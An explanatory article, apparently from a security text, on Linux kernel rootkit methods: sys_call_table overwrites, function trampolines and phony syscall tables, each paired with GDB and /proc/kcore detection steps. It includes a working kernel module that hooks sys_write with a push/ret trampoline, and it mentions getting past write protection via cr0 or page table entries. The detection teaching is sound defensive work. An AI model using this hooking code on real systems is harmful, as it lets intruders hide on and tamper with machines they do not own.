Traditional kernel rootkits, such as adore and phalanx, worked by overwriting pointers in sys_call_table so that they pointed to a replacement function, which would then call the original syscall as needed. This was accomplished by either an LKM or a program that modified the kernel through /dev/kmem or /dev/mem. On today's Linux systems, these writable windows into memory are, for security reasons, either disabled or restricted to read operations, depending on how the kernel is configured. Other measures have been taken to prevent this type of infection, such as marking sys_call_table as const so that it is stored in the .rodata section of the text segment. This can be bypassed by marking the corresponding PTE (short for Page Table Entry) as writeable, or by disabling the write-protect bit in the cr0 register. Therefore, this type of infection is still a very reliable way to make a rootkit today, but it is also very easily detected.
To detect sys_call_table modifications, you may look at the System.map file or /proc/kallsyms to see what the memory address of each system call should be. For instance, if we want to detect whether or not the sys_write system call has been infected, we need to learn the legitimate address of sys_write and its index within the sys_call_table, and then validate that the correct address is actually stored there in memory using GDB and /proc/kcore.
$ sudo grep sys_write /proc/kallsyms
ffffffff811d5310 T sys_write
$ grep _write /usr/include/x86_64-linux-gnu/asm/unistd_64.h
#define __NR_write 1
$ sudo gdb -q vmlinux /proc/kcore
(gdb) x/gx &sys_call_table+1
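0xffffffff81801464 <sys_call_table+4>: 0x811d5310ffffffff
Notice that GDB displays sys_call_table+4 rather than sys_call_table+8: without type information for the symbol, it steps in 4-byte units, so the 8-byte read straddles entries 0 and 1. Because numbers are stored in little endian on the x86 architecture, the upper 32 bits of the displayed value (0x811d5310) are the lower half of sys_call_table[1], and the lower 32 bits (0xffffffff) are the upper half of sys_call_table[0]. The upper half of entry 1 is not shown, but kernel text addresses on this system share the 0xffffffff prefix, so the value at sys_call_table[1] is equivalent to the correct sys_write address as looked up in /proc/kallsyms. We have therefore verified that the sys_call_table entry for sys_write has not been tampered with.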
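To see why the word displayed at sys_call_table+4 looks the way it does, the following userspace C sketch models two adjacent table entries as little-endian bytes and reads 8 bytes at a chosen offset. The helper names are hypothetical, and the address used for entry 0 in the note below is made up for illustration; only the sys_write address comes from the output above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Decode 8 bytes starting at buf[off] as a little-endian 64-bit value. */
static uint64_t read_le64(const uint8_t *buf, size_t off)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | buf[off + (size_t)i];
    return v;
}

/* Store a 64-bit value at buf[off] in little-endian byte order. */
static void write_le64(uint8_t *buf, size_t off, uint64_t v)
{
    for (size_t i = 0; i < 8; i++)
        buf[off + i] = (uint8_t)(v >> (8 * i));
}

/*
 * Model a two-entry slice of sys_call_table and return the 64-bit word
 * that a read at byte offset `off` (0..8) would produce.
 */
static uint64_t model_table_read(uint64_t entry0, uint64_t entry1, size_t off)
{
    uint8_t table[16];

    assert(off <= 8); /* the 8-byte read must stay inside the model */
    write_le64(table, 0, entry0);
    write_le64(table, 8, entry1);
    return read_le64(table, off);
}
```

With a made-up entry 0 of 0xffffffff811d5270 and the sys_write address as entry 1, a read at offset 4 yields 0x811d5310ffffffff, the same word GDB printed, while an aligned read at offset 8 yields the full 0xffffffff811d5310.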
Kernel function trampolines were originally introduced by Silvio Cesare in 1998. The idea was to be able to modify syscalls without having to touch sys_call_table, but in fact the technique allows any function in the kernel to be hooked, which makes it very powerful. A lot has changed since 1998: the kernel's text segment can no longer be modified without disabling the write-protect bit in cr0 or modifying a PTE. The main issue, however, is that most modern kernels use SMP, and kernel function trampolines are unsafe there because they perform non-atomic operations such as memcpy() every time the patched function is called, so another CPU can enter the function while its first bytes are only partially rewritten. As it turns out, there are methods for circumventing this problem as well, using a technique that I will not discuss here. The real point is that kernel function trampolines are still being used, and therefore understanding them is still quite important.
It is considered a safer technique to patch the individual call instructions that invoke the original function so that they invoke the replacement function instead. This method can be used as an alternative to function trampolines, but it may be arduous to find every single call, and the call sites often change from kernel to kernel. Therefore, this method is not as portable.
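As a rough illustration of what patching a single call instruction involves, the userspace sketch below rewrites the displacement of a 5-byte x86 near call (opcode 0xE8 followed by a signed 32-bit offset relative to the next instruction). The function names and the addresses in the note are hypothetical; a real patch would additionally have to deal with write protection and SMP safety, which this sketch does not attempt.

```c
#include <assert.h>
#include <stdint.h>

/*
 * Retarget a near call in place. site_addr is the address of the 0xE8
 * opcode byte. Returns 0 on success, or -1 if insn is not a near call or
 * new_target cannot be reached with a 32-bit displacement.
 */
static int retarget_call(uint8_t insn[5], uint64_t site_addr, uint64_t new_target)
{
    assert(insn != 0);
    if (insn[0] != 0xE8)
        return -1;

    /* The displacement is relative to the instruction after the call. */
    int64_t rel = (int64_t)(new_target - (site_addr + 5));
    if (rel < INT32_MIN || rel > INT32_MAX)
        return -1;

    uint32_t u = (uint32_t)(int32_t)rel;
    for (int i = 0; i < 4; i++)
        insn[1 + i] = (uint8_t)(u >> (8 * i)); /* little-endian rel32 */
    return 0;
}

/* Compute the address that a near call located at site_addr targets. */
static uint64_t call_target(const uint8_t insn[5], uint64_t site_addr)
{
    uint32_t u = 0;

    for (int i = 3; i >= 0; i--)
        u = (u << 8) | insn[1 + i];
    return site_addr + 5 + (uint64_t)(int64_t)(int32_t)u;
}
```

The same call_target() arithmetic is useful on the detection side: decoding each call site and comparing the result with the expected function address reveals a redirected call.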
Imagine you want to hijack the SYS_write syscall and do not want to modify sys_call_table directly, since that is easily detectable. This can be accomplished by overwriting the start of the sys_write code with a 6-byte stub that jumps to another function. (The example below copies 7 bytes, because the stub is stored as a string literal that includes a terminating NUL.)
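#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/string.h>
#include <linux/unistd.h>

#define SYSCALL_NR __NR_write
// assumed to be resolvable here; modern kernels do not export it
extern void *sys_call_table[];
static char syscall_code[7];
static char new_syscall_code[7] =
    "\x68\x00\x00\x00\x00\xc3"; // push $addr; ret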
// our new version of sys_write
long new_syscall(long fd, void *buf, size_t len)
{
    long ret;

    printk(KERN_INFO "I am the evil sys_write!\n");
    // Copy the original code back over the start of
    // sys_write (remove trampoline)
    memcpy(
        sys_call_table[SYSCALL_NR], syscall_code,
        sizeof(syscall_code)
    );
    // now we invoke the original system call with no trampoline
    ret = ((long (*)(long, void *, size_t))sys_call_table[SYSCALL_NR])(fd, buf, len);
    // Copy the trampoline back in place!
    memcpy(
        sys_call_table[SYSCALL_NR], new_syscall_code,
        sizeof(syscall_code)
    );
    // hand the original syscall's result back to the caller
    return ret;
}
int init_module(void)
{
    // patch trampoline code with address of new sys_write
    // (assumes 32-bit x86, where long and the push immediate are 4 bytes)
    *(long *)&new_syscall_code[1] = (long)new_syscall;
    // save the original code, then insert trampoline code into sys_write
    memcpy(
        syscall_code, sys_call_table[SYSCALL_NR],
        sizeof(syscall_code)
    );
    memcpy(
        sys_call_table[SYSCALL_NR], new_syscall_code,
        sizeof(syscall_code)
    );
    return 0;
}
void cleanup_module(void)
{
    // remove infection (trampoline)
    memcpy(
        sys_call_table[SYSCALL_NR], syscall_code,
        sizeof(syscall_code)
    );
}
This code example replaces the first 6 bytes of sys_write with a push; ret stub, which pushes the address of the new sys_write function onto the stack and returns to it. The new sys_write function can then do any sneaky stuff it wants to, although in this example we only print a message to the kernel log buffer. After it has done the sneaky stuff, it must remove the trampoline code so that it can call the untampered sys_write, and finally it puts the trampoline code back in place.
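The layout of the stub itself can be checked in isolation. The following userspace sketch (the function name and STUB_LEN are hypothetical, and it assumes a 32-bit target address as the example does) assembles the same push; ret byte sequence one byte at a time instead of through a pointer cast, which makes the 6-byte length explicit.

```c
#include <assert.h>
#include <stdint.h>

#define STUB_LEN 6 /* push imm32 (5 bytes) + ret (1 byte) */

/* Fill stub[] with the machine code for: push $target; ret */
static void build_push_ret(uint8_t stub[STUB_LEN], uint32_t target)
{
    assert(stub != 0);
    stub[0] = 0x68;                                 /* push imm32 */
    for (int i = 0; i < 4; i++)
        stub[1 + i] = (uint8_t)(target >> (8 * i)); /* little-endian */
    stub[5] = 0xC3;                                 /* ret */
}
```

Because push takes only a 32-bit immediate, this form cannot carry an arbitrary 64-bit address, which is one reason the stub in the example is tied to 32-bit targets.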
Typically, function trampolines will overwrite part of the procedure prologue (the first 5 to 7 bytes) of the function that they are hooking. So, to detect function trampolines within any kernel function or syscall, you should inspect the first 5 to 7 bytes and look for code that jumps or returns to another address. Code like this can come in a variety of forms. Here are a few examples.
Push the target address onto the stack and return to it. This takes up 6 bytes of machine code when a 32-bit target address is used:
push $address
ret
Move the target address into a register for an indirect jump. This takes 7 bytes of code when a 32-bit target address is used:
movl $addr, %eax
jmp *%eax
Calculate the offset and perform a relative jump. This takes 5 bytes of code when a 32-bit offset is used:
jmp offset
If, for instance, we want to validate whether or not the sys_write syscall has been hooked with a function trampoline, we can simply examine its code to see whether the procedure prologue is still in place:
$ sudo grep sys_write /proc/kallsyms
0xffffffff811d5310
$ sudo gdb -q vmlinux /proc/kcore
Reading symbols from vmlinux...
[New process 1]
Core was generated by `BOOT_IMAGE=/vmlinuz-3.16.0-49-generic root=/dev/mapper/ubuntu--vg-root ro quiet'.
#0 0x0000000000000000 in ?? ()
(gdb) x/3i 0xffffffff811d5310
0xffffffff811d5310 <sys_write>: data32 data32 data32 xchg %ax,%ax
0xffffffff811d5315 <sys_write+5>: push %rbp
0xffffffff811d5316 <sys_write+6>: mov %rsp,%rbp
The first 5 bytes are actually NOP instructions that serve as alignment padding (or possibly as space for ftrace probes). The kernel uses a specific byte sequence for this (0x66, 0x66, 0x66, 0x66, and 0x90), which GDB disassembles as a single instruction. The procedure prologue code follows the initial 5 NOP bytes and is perfectly intact. This validates that the sys_write syscall has not been hooked with any function trampolines.
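The three stub forms listed earlier have fixed opcode patterns, so the manual inspection can be approximated in code. The sketch below is a heuristic only, with hypothetical names: it classifies the first bytes of a function (for example, bytes read from /proc/kcore by some other means) and assumes the 32-bit encodings described above. An attacker can use other encodings, and a leading relative jump can also be placed by legitimate kernel facilities, so a match is a reason to look closer rather than proof of infection.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

enum tramp_kind {
    TRAMP_NONE,     /* no known stub pattern at function entry */
    TRAMP_PUSH_RET, /* push $imm32; ret           (68 xx xx xx xx c3) */
    TRAMP_MOV_JMP,  /* movl $imm32,%eax; jmp *%eax (b8 xx xx xx xx ff e0) */
    TRAMP_JMP_REL   /* jmp rel32                   (e9 xx xx xx xx) */
};

/* Classify the first bytes of a function against the three stub forms. */
static enum tramp_kind detect_trampoline(const uint8_t *code, size_t len)
{
    assert(code != NULL);
    if (len >= 6 && code[0] == 0x68 && code[5] == 0xC3)
        return TRAMP_PUSH_RET;
    if (len >= 7 && code[0] == 0xB8 && code[5] == 0xFF && code[6] == 0xE0)
        return TRAMP_MOV_JMP;
    if (len >= 5 && code[0] == 0xE9)
        return TRAMP_JMP_REL;
    return TRAMP_NONE;
}
```

Fed the bytes of the sys_write entry shown above (66 66 66 66 90 55 48 89 e5), the function returns TRAMP_NONE, which agrees with the manual reading of the disassembly.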
One classic way of infecting the kernel is by inserting a phony system call table into kernel memory and modifying the top-half interrupt handler that is responsible for invoking syscalls. On the x86 architecture, interrupt 0x80 is deprecated and has been replaced by the dedicated syscall/sysenter instructions for invoking system calls. Both syscall/sysenter and int 0x80 end up invoking the same function, named system_call(), which in turn calls the selected syscall within sys_call_table:
(gdb) x/i system_call_fastpath+19
0xffffffff8176ea86 <system_call_fastpath+19>:
callq *-0x7e7feba0(,%rax,8)
On x86_64, the preceding call instruction takes place after a swapgs in system_call(). Here is what the code looks like in entry.S:
call *sys_call_table(,%rax,8)
The (r/e)ax register contains the syscall number, which is multiplied by sizeof(long) to get the offset of the correct syscall pointer within the table. It is easily conceivable that an attacker could kmalloc() a phony system call table (a copy in which some pointers have been replaced with pointers to malicious functions) and then patch the call instruction so that the phony table is used. This technique is actually quite stealthy because it makes no modifications to the original sys_call_table. Unfortunately for intruders, however, this technique is still very easy to detect for the trained eye.
To detect whether the system_call() routine has been patched to call through a phony sys_call_table, simply disassemble the code with GDB and /proc/kcore, and check whether the displacement in the call instruction equals the address of sys_call_table. The correct sys_call_table address can be found in System.map or /proc/kallsyms.
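The comparison is simple arithmetic once the displacement has been read from the disassembly. In the sketch below (function names are hypothetical), the 32-bit displacement of the call instruction is sign-extended to 64 bits, as the CPU does when forming the effective address, and compared with the expected table address. The expected value used in the note is inferred from the earlier GDB output, where sys_call_table+4 was shown at 0xffffffff81801464; on a real system it should be taken from System.map or /proc/kallsyms.

```c
#include <assert.h>
#include <stdint.h>

/* Sign-extend the disp32 of `call *disp32(,%rax,8)` to a 64-bit address. */
static uint64_t table_from_disp32(int32_t disp)
{
    return (uint64_t)(int64_t)disp;
}

/* Address of the table slot the dispatch would read for syscall number nr. */
static uint64_t slot_address(int32_t disp, uint64_t nr)
{
    return table_from_disp32(disp) + nr * 8;
}

/* Return 1 if the call dispatches through the expected table, else 0. */
static int dispatch_uses_table(int32_t disp, uint64_t expected_table)
{
    return table_from_disp32(disp) == expected_table;
}
```

For the displacement shown earlier, -0x7e7feba0, the sign-extended value is 0xffffffff81801460, which matches the sys_call_table address implied by the first GDB session, so the dispatch in that example is untouched. Any other value would point at a substitute table.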